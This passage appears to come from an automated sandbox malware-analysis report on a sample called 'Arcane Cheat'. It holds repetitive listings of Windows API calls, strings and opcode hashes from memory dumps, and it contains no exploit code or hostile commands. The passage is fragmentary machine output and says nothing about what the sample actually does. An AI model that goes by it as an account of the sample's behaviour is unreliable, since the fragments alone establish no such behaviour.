                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DAB2
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DBD5
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: b7d173e5a33f8eaa6e7c8266a146388802c0ad82016fe099cb68154f221fd9a5
                                  • Instruction ID: 83780b0a61977c73541c5e3ac597b336e51557a4b242dbf28fcfd18876e2b4c9
                                  • Opcode Fuzzy Hash: b7d173e5a33f8eaa6e7c8266a146388802c0ad82016fe099cb68154f221fd9a5
                                  • Instruction Fuzzy Hash: DFA011EA2AC20ABC300822003C0BC3A022CF0C0BB2B30880AB80AC0080AE800C0A00B2
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DBD5
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 4d56c7833b02eca171b03393279ad87a2662cd94d10f2b36652078b1be487eed
                                  • Instruction ID: 83780b0a61977c73541c5e3ac597b336e51557a4b242dbf28fcfd18876e2b4c9
                                  • Opcode Fuzzy Hash: 4d56c7833b02eca171b03393279ad87a2662cd94d10f2b36652078b1be487eed
                                  • Instruction Fuzzy Hash: DFA011EA2AC20ABC300822003C0BC3A022CF0C0BB2B30880AB80AC0080AE800C0A00B2
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DBD5
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: d599c6a5b32b966de8926b03273c11c18b109ba44fe3ec3d21c9a9c2c1586d87
                                  • Instruction ID: 83780b0a61977c73541c5e3ac597b336e51557a4b242dbf28fcfd18876e2b4c9
                                  • Opcode Fuzzy Hash: d599c6a5b32b966de8926b03273c11c18b109ba44fe3ec3d21c9a9c2c1586d87
                                  • Instruction Fuzzy Hash: DFA011EA2AC20ABC300822003C0BC3A022CF0C0BB2B30880AB80AC0080AE800C0A00B2
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DBD5
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: f5768034a64a56f37be84ce2f3beed16f65973a9ac0bdead213f41940be87393
                                  • Instruction ID: 83780b0a61977c73541c5e3ac597b336e51557a4b242dbf28fcfd18876e2b4c9
                                  • Opcode Fuzzy Hash: f5768034a64a56f37be84ce2f3beed16f65973a9ac0bdead213f41940be87393
                                  • Instruction Fuzzy Hash: DFA011EA2AC20ABC300822003C0BC3A022CF0C0BB2B30880AB80AC0080AE800C0A00B2
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DC36
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 402ba736731e2c360fd7c5067d4c77f1fb3141aa02ec9e41969142075e0cd852
                                  • Instruction ID: 99224c769e08b2d3d8d886ce3112e42ec05fad2838496b86753d3ffd4387f1d0
                                  • Opcode Fuzzy Hash: 402ba736731e2c360fd7c5067d4c77f1fb3141aa02ec9e41969142075e0cd852
                                  • Instruction Fuzzy Hash: 67A011EA2BC302BC300C22003C03C3A022CE0C8B22B30880AB80BE0280AA802C0A80B2
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DC36
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 38bdc4ced502226d4cdd4b9bea69be88e9c5738c31808d7df631c46ee1da860f
                                  • Instruction ID: 99224c769e08b2d3d8d886ce3112e42ec05fad2838496b86753d3ffd4387f1d0
                                  • Opcode Fuzzy Hash: 38bdc4ced502226d4cdd4b9bea69be88e9c5738c31808d7df631c46ee1da860f
                                  • Instruction Fuzzy Hash: 67A011EA2BC302BC300C22003C03C3A022CE0C8B22B30880AB80BE0280AA802C0A80B2
                                  APIs
                                  • SetEndOfFile.KERNELBASE(?,00829104,?,?,-00001964), ref: 00829EC2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: File
                                  • String ID:
                                  • API String ID: 749574446-0
                                  • Opcode ID: 776811c42112ab33872b1c350d9156a6385706147b2c02e893ceacfc01e556ad
                                  • Instruction ID: f78922cd17d66206049808326ad57686a62ec053ae9859ceb241b0cb05226b31
                                  • Opcode Fuzzy Hash: 776811c42112ab33872b1c350d9156a6385706147b2c02e893ceacfc01e556ad
                                  • Instruction Fuzzy Hash: 69B011300A0A0A8B8E002B30CC088283A20FA2230B30082A0A002CA0A0CB22C002AA00
                                  APIs
                                  • SetCurrentDirectoryW.KERNELBASE(?,0083A587,C:\Users\user\Desktop,00000000,0086946A,00000006), ref: 0083A326
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: CurrentDirectory
                                  • String ID:
                                  • API String ID: 1611563598-0
                                  • Opcode ID: b6d7b0382e4c5c0cd81c943eb6384edef764da608cced1fc68b122997164dc41
                                  • Instruction ID: 0b348f479dea2703a900a67e40dbb9e0e383bb4e039a9a2ec5583adf85d70e7f
                                  • Opcode Fuzzy Hash: b6d7b0382e4c5c0cd81c943eb6384edef764da608cced1fc68b122997164dc41
                                  • Instruction Fuzzy Hash: A5A012301D4106568A010B30CC09C1576506760703F0086207002C00A0CF30C814A500
                                  APIs
                                    • Part of subcall function 0082130B: GetDlgItem.USER32(00000000,00003021), ref: 0082134F
                                    • Part of subcall function 0082130B: SetWindowTextW.USER32(00000000,008535B4), ref: 00821365
                                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0083B971
                                  • EndDialog.USER32(?,00000006), ref: 0083B984
                                  • GetDlgItem.USER32(?,0000006C), ref: 0083B9A0
                                  • SetFocus.USER32(00000000), ref: 0083B9A7
                                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 0083B9E1
                                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0083BA18
                                  • FindFirstFileW.KERNEL32(?,?), ref: 0083BA2E
                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0083BA4C
                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0083BA5C
                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0083BA78
                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0083BA94
                                  • _swprintf.LIBCMT ref: 0083BAC4
                                    • Part of subcall function 0082400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0082401D
                                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0083BAD7
                                  • FindClose.KERNEL32(00000000), ref: 0083BADE
                                  • _swprintf.LIBCMT ref: 0083BB37
                                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 0083BB4A
                                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0083BB67
                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0083BB87
                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0083BB97
                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0083BBB1
                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0083BBC9
                                  • _swprintf.LIBCMT ref: 0083BBF5
                                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0083BC08
                                  • _swprintf.LIBCMT ref: 0083BC5C
                                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 0083BC6F
                                    • Part of subcall function 0083A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0083A662
                                    • Part of subcall function 0083A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0085E600,?,?), ref: 0083A6B1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                  • API String ID: 797121971-1840816070
                                  • Opcode ID: cb5796aa53e800f3089de012ddf02bec7a83e0aa2a1af0ba7907b1203a35f09e
                                  • Instruction ID: ec24a9f182c5841c82a998ed17767a6f59e4888b87584243e85668f120d5364a
                                  • Opcode Fuzzy Hash: cb5796aa53e800f3089de012ddf02bec7a83e0aa2a1af0ba7907b1203a35f09e
                                  • Instruction Fuzzy Hash: C39193B2144348BBD7319BA4DC49FFB7BACFB89745F040819B749D2091EB75A6048B62
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00827191
                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 008272F1
                                  • CloseHandle.KERNEL32(00000000), ref: 00827301
                                    • Part of subcall function 00827BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00827C04
                                    • Part of subcall function 00827BF5: GetLastError.KERNEL32 ref: 00827C4A
                                    • Part of subcall function 00827BF5: CloseHandle.KERNEL32(?), ref: 00827C59
                                  • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0082730C
                                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0082741A
                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00827446
                                  • CloseHandle.KERNEL32(?), ref: 00827457
                                  • GetLastError.KERNEL32 ref: 00827467
                                  • RemoveDirectoryW.KERNEL32(?), ref: 008274B3
                                  • DeleteFileW.KERNEL32(?), ref: 008274DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                  • API String ID: 3935142422-3508440684
                                  • Opcode ID: 8908e205d43799b98d66ca7940a6f5881ac90c4fbeead00d82381c69a280797d
                                  • Instruction ID: 4e0569e6797fa0342d7df3e3b0227b187643dfd7fd49d88ed300affea344a56f
                                  • Opcode Fuzzy Hash: 8908e205d43799b98d66ca7940a6f5881ac90c4fbeead00d82381c69a280797d
                                  • Instruction Fuzzy Hash: 2EB1D571904229ABDF21DF64EC45BEE77B8FF04304F044569F949E7282D734AA89CB61
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: H_prolog_memcmp
                                  • String ID: CMT$h%u$hc%u
                                  • API String ID: 3004599000-3282847064
                                  • Opcode ID: e6dab02327b0a23277de30d46979c4a60aa0f482f21f2ac03ec72c601a0b1d35
                                  • Instruction ID: 4d33c84b6c1cd0629dbfacc7b23b21fa6c40624bbb8ef261e473e43e1f6ef35c
                                  • Opcode Fuzzy Hash: e6dab02327b0a23277de30d46979c4a60aa0f482f21f2ac03ec72c601a0b1d35
                                  • Instruction Fuzzy Hash: F1329F715106949FDF14DF28D895AEA37A5FF25300F44047EFD8ACB282DB74AA88CB61
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: __floor_pentium4
                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                  • API String ID: 4168288129-2761157908
                                  • Opcode ID: 354c689e3979f597d6ac36488fb72f069912203c35678d96c71dde5deb4b3111
                                  • Instruction ID: c6f931887c9199e9c2ed3950bd6618cafcda7b5557b7a8c79ef2a8209a29b49b
                                  • Opcode Fuzzy Hash: 354c689e3979f597d6ac36488fb72f069912203c35678d96c71dde5deb4b3111
                                  • Instruction Fuzzy Hash: 12C21772E0862C8FDB25CE289D407EAB7B5FB84315F1545EAD84DE7240E778AE818F41
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 008227F1
                                  • _strlen.LIBCMT ref: 00822D7F
                                    • Part of subcall function 0083137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0082B652,00000000,?,?,?,00010450), ref: 00831396
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00822EE0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                  • String ID: CMT
                                  • API String ID: 1706572503-2756464174
                                  APIs
                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00848767
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00848771
                                  • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 0084877E
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                  • String ID:
                                  • API String ID: 3906539128-0
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0083A662
                                  • GetNumberFormatW.KERNEL32(00000400,00000000,?,0085E600,?,?), ref: 0083A6B1
                                  Similarity
                                  • API ID: FormatInfoLocaleNumber
                                  • String ID:
                                  • API String ID: 2169056816-0
                                  APIs
                                  • GetLastError.KERNEL32(0083117C,?,00000200), ref: 00826EC9
                                  • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00826EEA
                                  Similarity
                                  • API ID: ErrorFormatLastMessage
                                  • String ID:
                                  • API String ID: 3479602957-0
                                  APIs
